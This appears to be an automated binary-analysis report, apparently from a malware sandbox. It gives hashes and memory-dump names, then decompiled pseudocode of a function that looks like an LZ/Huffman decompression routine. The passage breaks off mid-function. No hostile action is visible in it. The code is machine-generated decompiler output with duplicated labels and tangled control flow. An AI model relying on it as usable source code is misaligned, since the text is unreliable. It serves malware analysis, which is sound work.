                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 025838e87d3d79a898aa7a066f63443f012015173e501ce64e9fa3a7eb7a8577
                • Instruction ID: e8197b3bbb2d5428f72457c3ef3f3e1e3f66bdbe0f2c5eaae93ea41dbe02ad56
                • Opcode Fuzzy Hash: 025838e87d3d79a898aa7a066f63443f012015173e501ce64e9fa3a7eb7a8577
                • Instruction Fuzzy Hash: 1CA00274603302DFD7409F35AF0930D3FE9BA55AD1B09D16AA61DC6274EB34C860BB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB589E, Relevance: .8, Instructions: 800COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 96%
                			E00CB589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00CB47DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00CB33D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00CB397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00CB4422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E00CAA4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E00CAA4ED(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E00CAA4ED(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E00CBEA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00CB20EE();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x30) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E00CBEA80(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00CB1A0E(_t638, _t658 + 0x1c);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x1c);
										_t414 = E00CB3564(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E00CAA4ED(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E00CAA4ED(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x14) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x30) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E00CB7D76(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x30) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x30) - _t632;
													if( *(_t658 + 0x30) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x30) = _t381;
														_t640 = _t381;
														do {
															L82:
															E00CBEA80(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x10));
														_t598 =  *(_t658 + 0x18);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E00CB7D76(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E00CAA4ED(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
